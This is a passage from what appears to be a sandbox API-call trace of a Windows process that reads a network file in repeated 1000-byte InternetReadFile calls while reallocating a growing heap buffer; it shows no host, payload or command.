lpBuffer=0x392ce40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392ce40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.567] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x392d228, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x392d228*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.567] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x25800) returned 0x38ea170 [0106.569] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x390f980 | out: hHeap=0x29a0000) returned 1 [0106.570] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3907e00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3907e00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.570] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39081e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39081e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.570] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39085d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39085d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39089b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39089b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3908da0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3908da0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3909188, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3909188*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.582] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3909570, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3909570*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.582] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3909958, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3909958*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.582] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3909d40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3909d40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.582] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390a128, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390a128*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.583] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390a510, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390a510*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.583] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390a8f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390a8f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.583] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390ace0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390ace0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.583] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390b0c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390b0c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.583] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390b4b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390b4b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390b898, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390b898*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390bc80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390bc80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390c068, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390c068*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390c450, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390c450*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390c838, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390c838*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390cc20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390cc20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.585] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390d008, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390d008*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.585] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390d3f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390d3f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.585] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390d7d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390d7d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.585] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390dbc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390dbc0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.585] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390dfa8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390dfa8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.585] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390e390, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390e390*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.586] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390e778, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390e778*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.586] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390eb60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390eb60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.586] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390ef48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390ef48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.586] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390f330, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x390f330*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.586] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d000) returned 0x390f980 [0106.590] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea170 | out: hHeap=0x29a0000) returned 1 [0106.591] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3934f28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3934f28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.592] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3935310, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3935310*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.592] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39356f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39356f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.592] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3935ae0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3935ae0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.592] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3935ec8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3935ec8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.592] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39362b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39362b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.592] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3936698, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3936698*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.593] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3936a80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3936a80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.593] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3936e68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3936e68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.593] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3937250, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3937250*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.593] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3937638, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3937638*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.593] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3937a20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3937a20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.593] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3937e08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3937e08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.593] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39381f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39381f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.594] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39385d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39385d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.594] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39389c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39389c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.594] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3938da8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3938da8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.594] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3939190, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3939190*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.594] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3939578, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3939578*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.594] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3939960, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3939960*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.595] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3939d48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3939d48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.595] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x393a130, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x393a130*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.595] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x393a518, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x393a518*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.595] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x393a900, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x393a900*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.595] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x393ace8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x393ace8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.596] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x393b0d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x393b0d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.596] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x393b4b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x393b4b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.596] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x393b8a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x393b8a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.596] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x393bc88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x393bc88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.596] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x393c070, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x393c070*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.596] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x393c458, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x393c458*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.597] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x34800) returned 0x3970048 [0106.600] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x390f980 | out: hHeap=0x29a0000) returned 1 [0106.603] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399cf08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399cf08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.603] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399d2f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399d2f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.603] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399d6d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399d6d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.604] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399dac0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399dac0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.604] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399dea8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399dea8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.604] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399e290, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399e290*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.604] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399e678, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399e678*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.604] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399ea60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399ea60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.605] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399ee48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399ee48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.605] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399f230, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399f230*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.605] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399f618, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399f618*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.606] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399fa00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399fa00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.606] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399fde8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399fde8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.606] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a01d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a01d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.606] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a05b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a05b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.606] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a09a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a09a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.606] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a0d88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a0d88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.607] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1170, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1170*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.607] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1558, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1558*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.607] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1940, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1940*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.607] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1d28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1d28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.607] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a2110, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a2110*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.608] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a24f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a24f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.608] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a28e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a28e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.608] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a2cc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a2cc8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.608] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a30b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a30b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.608] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a3498, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a3498*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.608] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a3880, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a3880*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.609] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a3c68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a3c68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.609] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4050, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4050*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.609] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4438, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4438*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.609] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3c000) returned 0x38ea170 [0106.613] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0106.615] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x391e948, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x391e948*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.615] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x391ed30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x391ed30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.615] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x391f118, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x391f118*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.616] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x391f500, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x391f500*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.616] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x391f8e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x391f8e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.616] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x391fcd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x391fcd0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.616] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39200b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39200b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.616] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39204a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39204a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.616] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3920888, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3920888*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.616] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3920c70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3920c70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.617] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3921058, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3921058*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.617] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3921440, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3921440*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.617] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3921828, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3921828*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.617] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3921c10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3921c10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.617] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3921ff8, 